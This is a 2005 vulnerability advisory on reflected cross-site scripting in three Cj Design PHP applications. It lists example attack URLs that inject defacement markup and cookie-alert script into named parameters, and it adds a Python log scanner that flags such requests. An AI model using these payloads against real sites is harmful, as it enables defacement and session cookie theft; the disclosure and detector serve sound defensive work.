Cj Design: Three Applications, One Bug
######################################################################
[Psymera Advisory #1] CjTagBoard 3.0 - CjLinkOut 1.0 - CjWeb2Mail 3.0
######################################################################
Software:     CjTagBoard
              CjLinkOut
              CjWeb2Mail
Versions:     CjTagBoard =3.0
              CjLinkOut  =1.0
              CjWeb2Mail =3.0
Language:     PHP
Type:         Cross-Site Scripting
Risk:         Low
Examples:     A] CjTagBoard XSS
              B] CjLinkOut XSS
              C] CjWeb2Mail XSS
Exploitation: remote
Date:         07 Sep 2005
Vendor:       Cj Design
Page:         http://www.cj-design.com/
Author:       Psymera
e-mail:       psymera@xxxxxxxxxxx
######################################################################
-----------------
A] CjTagBoard XSS
-----------------
http://[target]/[folder]/details.php?date=<h1>DEFACED</h1><script>alert(document.cookie);</script>
http://[target]/[folder]/details.php?time=<h1>DEFACED</h1><script>alert(document.cookie);</script>
http://[target]/[folder]/details.php?name=<h1>DEFACED</h1><script>alert(document.cookie);</script>
http://[target]/[folder]/details.php?ip=<h1>DEFACED</h1><script>alert(document.cookie);</script>
http://[target]/[folder]/details.php?agent=<h1>DEFACED</h1><script>alert(document.cookie);</script>
http://[target]/[folder]/display.php?msg=<h1>DEFACED</h1><script>alert(document.cookie);</script>
----------------
B] CjLinkOut XSS
----------------
http://[target]/[folder]/top.php?123="><h1>hola</h1><script>alert(document.cookie);</script><
-----------------
C] CjWeb2Mail XSS
-----------------
http://[target]/[folder]/thankyou.php?name=<h1>Defaced</h1><script>alert(document.cookie);</script>
http://[target]/[folder]/thankyou.php?sent=1&name=<h1>Defaced</h1><script>alert(document.cookie);</script>
http://[target]/[folder]/thankyou.php?sent=1&message=<h1>Defaced</h1><script>alert(document.cookie);</script>
http://[target]/[folder]/thankyou.php?sent=1&show_ip=yes&ip=<h1>deface</h1><script>alert(document.cookie);</script>
http://[target]/[folder]/web2mail.php?error_messages=yes&emsg=<h1>Deface</h1><script>alert(document.cookie);</script>
#######################################################################
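For defenders, the script and parameter names listed in sections A to C can be turned into a web-server log check that flags requests carrying HTML markup in those parameters. This is an added example, not part of the original advisory or the vendor's code. Assumptions: combined-format access logs, constructed sample lines, hypothetical function names, and checking every parameter of top.php because the advisory shows it only with the name 123.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script -> reflected parameters, from the advisory's example URLs.
# None = check every parameter (assumption: top.php is shown only with "123").
AFFECTED = {
    "details.php": {"date", "time", "name", "ip", "agent"},
    "display.php": {"msg"},
    "top.php": None,
    "thankyou.php": {"name", "message", "ip"},
    "web2mail.php": {"emsg"},
}
MARKUP = re.compile(r'[<>"]')  # characters needed to leave HTML text/attribute context
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')  # request line in a log entry

def suspicious_params(url):
    """Return sorted names of affected parameters whose decoded value has markup."""
    parts = urlsplit(url)
    script = parts.path.rsplit("/", 1)[-1].lower()
    if script not in AFFECTED:
        return []
    wanted = AFFECTED[script]
    pairs = parse_qsl(parts.query, keep_blank_values=True)  # percent-decodes values
    return sorted({n for n, v in pairs
                   if (wanted is None or n in wanted) and MARKUP.search(v)})

def scan(lines):
    """Yield (line_number, url, parameter_names) for matching log lines."""
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        hits = suspicious_params(m.group(1)) if m else []
        if hits:
            yield n, m.group(1), hits

# Constructed sample log lines (not taken from the advisory or a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Sep/2005:10:00:00 +0000] "GET /tag/details.php?name=bob&ip=192.0.2.7 HTTP/1.1" 200 512',
    '192.0.2.11 - - [07/Sep/2005:10:00:05 +0000] "GET /tag/details.php?name=%3Ch1%3Ex%3C%2Fh1%3E HTTP/1.1" 200 530',
    '192.0.2.12 - - [07/Sep/2005:10:00:09 +0000] "GET /out/top.php?123=%22%3E%3Cb%3E HTTP/1.1" 200 210',
    '192.0.2.13 - - [07/Sep/2005:10:00:12 +0000] "GET /index.php?q=%3Cb%3E HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit means the request carried markup in a reflected parameter, not that script executed in a browser; the fix in the applications themselves is to HTML-encode these values on output.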